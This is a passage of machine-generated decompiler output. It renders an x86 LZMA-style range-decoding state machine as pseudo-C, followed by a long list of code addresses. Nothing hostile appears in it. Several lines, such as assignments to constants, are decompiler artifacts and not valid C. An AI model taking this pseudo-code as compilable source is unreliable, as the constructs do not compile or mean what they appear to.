                          								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                          								__eax =  *(__ebp - 4);
                          								__eax =  *(__ebp - 4) + 0x664;
                          								__eflags = __eax;
                          								 *(__ebp - 0x58) = __eax;
                          								goto L69;
                          							}
                          							__eax =  *(__ebp - 4);
                          							__ecx =  *(__ebp - 0x38);
                          							 *(__ebp - 0x84) = 8;
                          							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                          							goto L132;
                          						case 8:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__eax =  *(__ebp - 4);
                          								__ecx =  *(__ebp - 0x38);
                          								 *(__ebp - 0x84) = 0xa;
                          								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                          							} else {
                          								__eax =  *(__ebp - 0x38);
                          								__ecx =  *(__ebp - 4);
                          								__eax =  *(__ebp - 0x38) + 0xf;
                          								 *(__ebp - 0x84) = 9;
                          								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                          								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                          							}
                          							goto L132;
                          						case 9:
                          							goto L0;
                          						case 0xa:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__eax =  *(__ebp - 4);
                          								__ecx =  *(__ebp - 0x38);
                          								 *(__ebp - 0x84) = 0xb;
                          								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                          								goto L132;
                          							}
                          							__eax =  *(__ebp - 0x28);
                          							goto L88;
                          						case 0xb:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__ecx =  *(__ebp - 0x24);
                          								__eax =  *(__ebp - 0x20);
                          								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                          							} else {
                          								__eax =  *(__ebp - 0x24);
                          							}
                          							__ecx =  *(__ebp - 0x28);
                          							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          							L88:
                          							__ecx =  *(__ebp - 0x2c);
                          							 *(__ebp - 0x2c) = __eax;
                          							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          							goto L89;
                          						case 0xc:
                          							L99:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0xc;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t334 = __ebp - 0x70;
                          							 *_t334 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t334;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							__eax =  *(__ebp - 0x2c);
                          							goto L101;
                          						case 0xd:
                          							L37:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0xd;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t122 = __ebp - 0x70;
                          							 *_t122 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t122;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							L39:
                          							__eax =  *(__ebp - 0x40);
                          							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                          								goto L48;
                          							}
                          							__eflags = __ebx - 0x100;
                          							if(__ebx >= 0x100) {
                          								goto L54;
                          							}
                          							L41:
                          							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                          							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                          							__ecx =  *(__ebp - 0x58);
                          							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                          							 *(__ebp - 0x48) = __eax;
                          							__eax = __eax + 1;
                          							__eax = __eax << 8;
                          							__eax = __eax + __ebx;
                          							__esi =  *(__ebp - 0x58) + __eax * 2;
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          							__ax =  *__esi;
                          							 *(__ebp - 0x54) = __esi;
                          							__edx = __ax & 0x0000ffff;
                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                          							__eflags =  *(__ebp - 0xc) - __ecx;
                          							if( *(__ebp - 0xc) >= __ecx) {
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          								__cx = __ax;
                          								 *(__ebp - 0x40) = 1;
                          								__cx = __ax >> 5;
                          								__eflags = __eax;
                          								__ebx = __ebx + __ebx + 1;
                          								 *__esi = __ax;
                          							} else {
                          								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                          								 *(__ebp - 0x10) = __ecx;
                          								0x800 = 0x800 - __edx;
                          								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                          								__ebx = __ebx + __ebx;
                          								 *__esi = __cx;
                          							}
                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                          							 *(__ebp - 0x44) = __ebx;
                          							if( *(__ebp - 0x10) >= 0x1000000) {
                          								goto L39;
                          							} else {
                          								goto L37;
                          							}
                          						case 0xe:
                          							L46:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0xe;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t156 = __ebp - 0x70;
                          							 *_t156 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t156;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							while(1) {
                          								L48:
                          								__eflags = __ebx - 0x100;
                          								if(__ebx >= 0x100) {
                          									break;
                          								}
                          								__eax =  *(__ebp - 0x58);
                          								__edx = __ebx + __ebx;
                          								__ecx =  *(__ebp - 0x10);
                          								__esi = __edx + __eax;
                          								__ecx =  *(__ebp - 0x10) >> 0xb;
                          								__ax =  *__esi;
                          								 *(__ebp - 0x54) = __esi;
                          								__edi = __ax & 0x0000ffff;
                          								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          								__eflags =  *(__ebp - 0xc) - __ecx;
                          								if( *(__ebp - 0xc) >= __ecx) {
                          									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          									__cx = __ax;
                          									_t170 = __edx + 1; // 0x1
                          									__ebx = _t170;
                          									__cx = __ax >> 5;
                          									__eflags = __eax;
                          									 *__esi = __ax;
                          								} else {
                          									 *(__ebp - 0x10) = __ecx;
                          									0x800 = 0x800 - __edi;
                          									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          									__ebx = __ebx + __ebx;
                          									 *__esi = __cx;
                          								}
                          								__eflags =  *(__ebp - 0x10) - 0x1000000;
                          								 *(__ebp - 0x44) = __ebx;
                          								if( *(__ebp - 0x10) >= 0x1000000) {
                          									continue;
                          								} else {
                          									goto L46;
                          								}
                          							}
                          							L54:
                          							_t173 = __ebp - 0x34;
                          							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                          							__eflags =  *_t173;
                          							goto L55;
                          						case 0xf:
                          							L58:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0xf;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t203 = __ebp - 0x70;
                          							 *_t203 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t203;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							L60:
                          							__eflags = __ebx - 0x100;
                          							if(__ebx >= 0x100) {
                          								L55:
                          								__al =  *(__ebp - 0x44);
                          								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                          								goto L56;
                          							}
                          							L61:
                          							__eax =  *(__ebp - 0x58);
                          							__edx = __ebx + __ebx;
                          							__ecx =  *(__ebp - 0x10);
                          							__esi = __edx + __eax;
                          							__ecx =  *(__ebp - 0x10) >> 0xb;
                          							__ax =  *__esi;
                          							 *(__ebp - 0x54) = __esi;
                          							__edi = __ax & 0x0000ffff;
                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          							__eflags =  *(__ebp - 0xc) - __ecx;
                          							if( *(__ebp - 0xc) >= __ecx) {
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          								__cx = __ax;
                          								_t217 = __edx + 1; // 0x1
                          								__ebx = _t217;
                          								__cx = __ax >> 5;
                          								__eflags = __eax;
                          								 *__esi = __ax;
                          							} else {
                          								 *(__ebp - 0x10) = __ecx;
                          								0x800 = 0x800 - __edi;
                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          								__ebx = __ebx + __ebx;
                          								 *__esi = __cx;
                          							}
                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                          							 *(__ebp - 0x44) = __ebx;
                          							if( *(__ebp - 0x10) >= 0x1000000) {
                          								goto L60;
                          							} else {
                          								goto L58;
                          							}
                          						case 0x10:
                          							L109:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0x10;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t365 = __ebp - 0x70;
                          							 *_t365 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t365;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							goto L111;
                          						case 0x11:
                          							goto L69;
                          						case 0x12:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__eax =  *(__ebp - 0x58);
                          								 *(__ebp - 0x84) = 0x13;
                          								__esi =  *(__ebp - 0x58) + 2;
                          								goto L132;
                          							}
                          							__eax =  *(__ebp - 0x4c);
                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                          							__ecx =  *(__ebp - 0x58);
                          							__eax =  *(__ebp - 0x4c) << 4;
                          							__eflags = __eax;
                          							__eax =  *(__ebp - 0x58) + __eax + 4;
                          							goto L130;
                          						case 0x13:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								_t469 = __ebp - 0x58;
                          								 *_t469 =  *(__ebp - 0x58) + 0x204;
                          								__eflags =  *_t469;
                          								 *(__ebp - 0x30) = 0x10;
                          								 *(__ebp - 0x40) = 8;
                          								L144:
                          								 *(__ebp - 0x7c) = 0x14;
                          								goto L145;
                          							}
                          							__eax =  *(__ebp - 0x4c);
                          							__ecx =  *(__ebp - 0x58);
                          							__eax =  *(__ebp - 0x4c) << 4;
                          							 *(__ebp - 0x30) = 8;
                          							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                          							L130:
                          							 *(__ebp - 0x58) = __eax;
                          							 *(__ebp - 0x40) = 3;
                          							goto L144;
                          						case 0x14:
                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                          							__eax =  *(__ebp - 0x80);
                          							goto L140;
                          						case 0x15:
                          							__eax = 0;
                          							__eflags =  *(__ebp - 0x38) - 7;
                          							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          							__al = __al & 0x000000fd;
                          							__eax = (__eflags >= 0) - 1 + 0xb;
                          							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                          							goto L120;
                          						case 0x16:
                          							__eax =  *(__ebp - 0x30);
                          							__eflags = __eax - 4;
                          							if(__eax >= 4) {
                          								_push(3);
                          								_pop(__eax);
                          							}
                          							__ecx =  *(__ebp - 4);
                          							 *(__ebp - 0x40) = 6;
                          							__eax = __eax << 7;
                          							 *(__ebp - 0x7c) = 0x19;
                          							 *(__ebp - 0x58) = __eax;
                          							goto L145;
                          						case 0x17:
                          							L145:
                          							__eax =  *(__ebp - 0x40);
                          							 *(__ebp - 0x50) = 1;
                          							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                          							goto L149;
                          						case 0x18:
                          							L146:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0x18;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t484 = __ebp - 0x70;
                          							 *_t484 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t484;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							L148:
                          							_t487 = __ebp - 0x48;
                          							 *_t487 =  *(__ebp - 0x48) - 1;
                          							__eflags =  *_t487;
                          							L149:
                          							__eflags =  *(__ebp - 0x48);
                          							if( *(__ebp - 0x48) <= 0) {
                          								__ecx =  *(__ebp - 0x40);
                          								__ebx =  *(__ebp - 0x50);
                          								0 = 1;
                          								__eax = 1 << __cl;
                          								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                          								__eax =  *(__ebp - 0x7c);
                          								 *(__ebp - 0x44) = __ebx;
                          								goto L140;
                          							}
                          							__eax =  *(__ebp - 0x50);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          							__eax =  *(__ebp - 0x58);
                          							__esi = __edx + __eax;
                          							 *(__ebp - 0x54) = __esi;
                          							__ax =  *__esi;
                          							__edi = __ax & 0x0000ffff;
                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          							__eflags =  *(__ebp - 0xc) - __ecx;
                          							if( *(__ebp - 0xc) >= __ecx) {
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          								__cx = __ax;
                          								__cx = __ax >> 5;
                          								__eax = __eax - __ecx;
                          								__edx = __edx + 1;
                          								__eflags = __edx;
                          								 *__esi = __ax;
                          								 *(__ebp - 0x50) = __edx;
                          							} else {
                          								 *(__ebp - 0x10) = __ecx;
                          								0x800 = 0x800 - __edi;
                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          								 *__esi = __cx;
                          							}
                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                          							if( *(__ebp - 0x10) >= 0x1000000) {
                          								goto L148;
                          							} else {
                          								goto L146;
                          							}
                          						case 0x19:
                          							__eflags = __ebx - 4;
                          							if(__ebx < 4) {
                          								 *(__ebp - 0x2c) = __ebx;
                          								L119:
                          								_t393 = __ebp - 0x2c;
                          								 *_t393 =  *(__ebp - 0x2c) + 1;
                          								__eflags =  *_t393;
                          								L120:
                          								__eax =  *(__ebp - 0x2c);
                          								__eflags = __eax;
                          								if(__eax == 0) {
                          									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                          									goto L170;
                          								}
                          								__eflags = __eax -  *(__ebp - 0x60);
                          								if(__eax >  *(__ebp - 0x60)) {
                          									goto L171;
                          								}
                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                          								__eax =  *(__ebp - 0x30);
                          								_t400 = __ebp - 0x60;
                          								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                          								__eflags =  *_t400;
                          								goto L123;
                          							}
                          							__ecx = __ebx;
                          							__eax = __ebx;
                          							__ecx = __ebx >> 1;
                          							__eax = __ebx & 0x00000001;
                          							__ecx = (__ebx >> 1) - 1;
                          							__al = __al | 0x00000002;
                          							__eax = (__ebx & 0x00000001) << __cl;
                          							__eflags = __ebx - 0xe;
                          							 *(__ebp - 0x2c) = __eax;
                          							if(__ebx >= 0xe) {
                          								__ebx = 0;
                          								 *(__ebp - 0x48) = __ecx;
                          								L102:
                          								__eflags =  *(__ebp - 0x48);
                          								if( *(__ebp - 0x48) <= 0) {
                          									__eax = __eax + __ebx;
                          									 *(__ebp - 0x40) = 4;
                          									 *(__ebp - 0x2c) = __eax;
                          									__eax =  *(__ebp - 4);
                          									__eax =  *(__ebp - 4) + 0x644;
                          									__eflags = __eax;
                          									L108:
                          									__ebx = 0;
                          									 *(__ebp - 0x58) = __eax;
                          									 *(__ebp - 0x50) = 1;
                          									 *(__ebp - 0x44) = 0;
                          									 *(__ebp - 0x48) = 0;
                          									L112:
                          									__eax =  *(__ebp - 0x40);
                          									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                          										_t391 = __ebp - 0x2c;
                          										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                          										__eflags =  *_t391;
                          										goto L119;
                          									}
                          									__eax =  *(__ebp - 0x50);
                          									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          									__eax =  *(__ebp - 0x58);
                          									__esi = __edi + __eax;
                          									 *(__ebp - 0x54) = __esi;
                          									__ax =  *__esi;
                          									__ecx = __ax & 0x0000ffff;
                          									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                          									__eflags =  *(__ebp - 0xc) - __edx;
                          									if( *(__ebp - 0xc) >= __edx) {
                          										__ecx = 0;
                          										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                          										__ecx = 1;
                          										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                          										__ebx = 1;
                          										__ecx =  *(__ebp - 0x48);
                          										__ebx = 1 << __cl;
                          										__ecx = 1 << __cl;
                          										__ebx =  *(__ebp - 0x44);
                          										__ebx =  *(__ebp - 0x44) | __ecx;
                          										__cx = __ax;
                          										__cx = __ax >> 5;
                          										__eax = __eax - __ecx;
                          										__edi = __edi + 1;
                          										__eflags = __edi;
                          										 *(__ebp - 0x44) = __ebx;
                          										 *__esi = __ax;
                          										 *(__ebp - 0x50) = __edi;
                          									} else {
                          										 *(__ebp - 0x10) = __edx;
                          										0x800 = 0x800 - __ecx;
                          										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                          										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          										 *__esi = __dx;
                          									}
                          									__eflags =  *(__ebp - 0x10) - 0x1000000;
                          									if( *(__ebp - 0x10) >= 0x1000000) {
                          										L111:
                          										_t368 = __ebp - 0x48;
                          										 *_t368 =  *(__ebp - 0x48) + 1;
                          										__eflags =  *_t368;
                          										goto L112;
                          									} else {
                          										goto L109;
                          									}
                          								}
                          								__ecx =  *(__ebp - 0xc);
                          								__ebx = __ebx + __ebx;
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                          								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          								 *(__ebp - 0x44) = __ebx;
                          								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                          									__ecx =  *(__ebp - 0x10);
                          									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          									__ebx = __ebx | 0x00000001;
                          									__eflags = __ebx;
                          									 *(__ebp - 0x44) = __ebx;
                          								}
                          								__eflags =  *(__ebp - 0x10) - 0x1000000;
                          								if( *(__ebp - 0x10) >= 0x1000000) {
                          									L101:
                          									_t338 = __ebp - 0x48;
                          									 *_t338 =  *(__ebp - 0x48) - 1;
                          									__eflags =  *_t338;
                          									goto L102;
                          								} else {
                          									goto L99;
                          								}
                          							}
                          							__edx =  *(__ebp - 4);
                          							__eax = __eax - __ebx;
                          							 *(__ebp - 0x40) = __ecx;
                          							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                          							goto L108;
                          						case 0x1a:
                          							L56:
                          							__eflags =  *(__ebp - 0x64);
                          							if( *(__ebp - 0x64) == 0) {
                          								 *(__ebp - 0x88) = 0x1a;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x68);
                          							__al =  *(__ebp - 0x5c);
                          							__edx =  *(__ebp - 8);
                          							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          							 *( *(__ebp - 0x68)) = __al;
                          							__ecx =  *(__ebp - 0x14);
                          							 *(__ecx +  *(__ebp - 8)) = __al;
                          							__eax = __ecx + 1;
                          							__edx = 0;
                          							_t192 = __eax %  *(__ebp - 0x74);
                          							__eax = __eax /  *(__ebp - 0x74);
                          							__edx = _t192;
                          							goto L79;
                          						case 0x1b:
                          							goto L75;
                          						case 0x1c:
                          							while(1) {
                          								L123:
                          								__eflags =  *(__ebp - 0x64);
                          								if( *(__ebp - 0x64) == 0) {
                          									break;
                          								}
                          								__eax =  *(__ebp - 0x14);
                          								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          								__eflags = __eax -  *(__ebp - 0x74);
                          								if(__eax >=  *(__ebp - 0x74)) {
                          									__eax = __eax +  *(__ebp - 0x74);
                          									__eflags = __eax;
                          								}
                          								__edx =  *(__ebp - 8);
                          								__cl =  *(__eax + __edx);
                          								__eax =  *(__ebp - 0x14);
                          								 *(__ebp - 0x5c) = __cl;
                          								 *(__eax + __edx) = __cl;
                          								__eax = __eax + 1;
                          								__edx = 0;
                          								_t414 = __eax %  *(__ebp - 0x74);
                          								__eax = __eax /  *(__ebp - 0x74);
                          								__edx = _t414;
                          								__eax =  *(__ebp - 0x68);
                          								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                          								__eflags =  *(__ebp - 0x30);
                          								 *( *(__ebp - 0x68)) = __cl;
                          								 *(__ebp - 0x14) = _t414;
                          								if( *(__ebp - 0x30) > 0) {
                          									continue;
                          								} else {
                          									goto L80;
                          								}
                          							}
                          							 *(__ebp - 0x88) = 0x1c;
                          							goto L170;
                          					}
                          				}
                          			}













                          0x00000000
                          0x00406398
                          0x00406398
                          0x0040639c
                          0x00406453
                          0x00406456
                          0x00406462
                          0x00406343
                          0x00406343
                          0x00406346
                          0x004066b8
                          0x004066b8
                          0x004066bb
                          0x004066bb
                          0x004066c1
                          0x004066c7
                          0x004066cd
                          0x004066e7
                          0x004066ea
                          0x004066f0
                          0x004066fb
                          0x004066fd
                          0x004066cf
                          0x004066cf
                          0x004066de
                          0x004066e2
                          0x004066e2
                          0x00406707
                          0x0040672e
                          0x0040672e
                          0x00406734
                          0x00406734
                          0x00000000
                          0x00406709
                          0x00406709
                          0x0040670d
                          0x004068bc
                          0x00000000
                          0x004068bc
                          0x00406719
                          0x00406720
                          0x00406728
                          0x0040672b
                          0x00000000
                          0x0040672b
                          0x004063a2
                          0x004063a6
                          0x004068e7
                          0x004068e7
                          0x004068ea
                          0x004068ee
                          0x004068ee
                          0x004063ac
                          0x004063b2
                          0x004063b5
                          0x004063b9
                          0x004063bc
                          0x004063c0
                          0x00406886
                          0x004068d2
                          0x004068da
                          0x004068e1
                          0x004068e3
                          0x00000000
                          0x004068e3
                          0x004063c6
                          0x004063c9
                          0x004063cf
                          0x004063d1
                          0x004063d1
                          0x004063d4
                          0x004063d7
                          0x004063da
                          0x004063dd
                          0x004063e0
                          0x004063e3
                          0x004063e4
                          0x004063e6
                          0x004063e6
                          0x004063e6
                          0x004063e9
                          0x004063ec
                          0x004063ef
                          0x004063f2
                          0x004063f2
                          0x004063f5
                          0x004063f7
                          0x004063f7
                          0x004063fa
                          0x004063fa
                          0x004063fa
                          0x00405ed0
                          0x00405ed0
                          0x00405ed9
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x00000000
                          0x00405eea
                          0x00000000
                          0x00000000
                          0x00405ef3
                          0x00405ef6
                          0x00405ef9
                          0x00405efd
                          0x00000000
                          0x00000000
                          0x00405f03
                          0x00405f06
                          0x00405f08
                          0x00405f09
                          0x00405f0c
                          0x00405f0e
                          0x00405f0f
                          0x00405f11
                          0x00405f14
                          0x00405f19
                          0x00405f1e
                          0x00405f27
                          0x00405f3a
                          0x00405f3d
                          0x00405f49
                          0x00405f71
                          0x00405f73
                          0x00405f81
                          0x00405f81
                          0x00405f85
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405f75
                          0x00405f75
                          0x00405f78
                          0x00405f79
                          0x00405f79
                          0x00000000
                          0x00405f75
                          0x00405f4f
                          0x00405f54
                          0x00405f54
                          0x00405f5d
                          0x00405f65
                          0x00405f68
                          0x00000000
                          0x00405f6e
                          0x00405f6e
                          0x00000000
                          0x00405f6e
                          0x00000000
                          0x00405f8b
                          0x00405f8b
                          0x00405f8f
                          0x0040683b
                          0x00000000
                          0x0040683b
                          0x00405f98
                          0x00405fa8
                          0x00405fab
                          0x00405fae
                          0x00405fae
                          0x00405fae
                          0x00405fb1
                          0x00405fb5
                          0x00000000
                          0x00000000
                          0x00405fb7
                          0x00405fbd
                          0x00405fe7
                          0x00405fed
                          0x00405ff4
                          0x00000000
                          0x00405ff4
                          0x00405fc3
                          0x00405fc6
                          0x00405fcb
                          0x00405fcb
                          0x00405fd6
                          0x00405fde
                          0x00405fe1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406026
                          0x0040602c
                          0x0040602f
                          0x0040603c
                          0x00406044
                          0x00000000
                          0x00000000
                          0x00405ffb
                          0x00405ffb
                          0x00405fff
                          0x0040684a
                          0x00000000
                          0x0040684a
                          0x0040600b
                          0x00406016
                          0x00406016
                          0x00406016
                          0x00406019
                          0x0040601c
                          0x0040601f
                          0x00406024
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040604c
                          0x0040604e
                          0x00406051
                          0x004060c2
                          0x004060c5
                          0x004060c8
                          0x004060cf
                          0x004060d9
                          0x00000000
                          0x004060d9
                          0x00406053
                          0x00406057
                          0x0040605a
                          0x0040605c
                          0x0040605f
                          0x00406062
                          0x00406064
                          0x00406067
                          0x00406069
                          0x0040606e
                          0x00406071
                          0x00406074
                          0x00406078
                          0x0040607f
                          0x00406082
                          0x00406089
                          0x0040608d
                          0x00406095
                          0x00406095
                          0x00406095
                          0x0040608f
                          0x0040608f
                          0x0040608f
                          0x00406084
                          0x00406084
                          0x00406084
                          0x00406099
                          0x0040609c
                          0x004060ba
                          0x004060bc
                          0x00000000
                          0x0040609e
                          0x0040609e
                          0x004060a1
                          0x004060a4
                          0x004060a7
                          0x004060a9
                          0x004060a9
                          0x004060a9
                          0x004060ac
                          0x004060af
                          0x004060b1
                          0x004060b2
                          0x004060b5
                          0x00000000
                          0x004060b5
                          0x00000000
                          0x004062eb
                          0x004062ef
                          0x0040630d
                          0x00406310
                          0x00406317
                          0x0040631a
                          0x0040631d
                          0x00406320
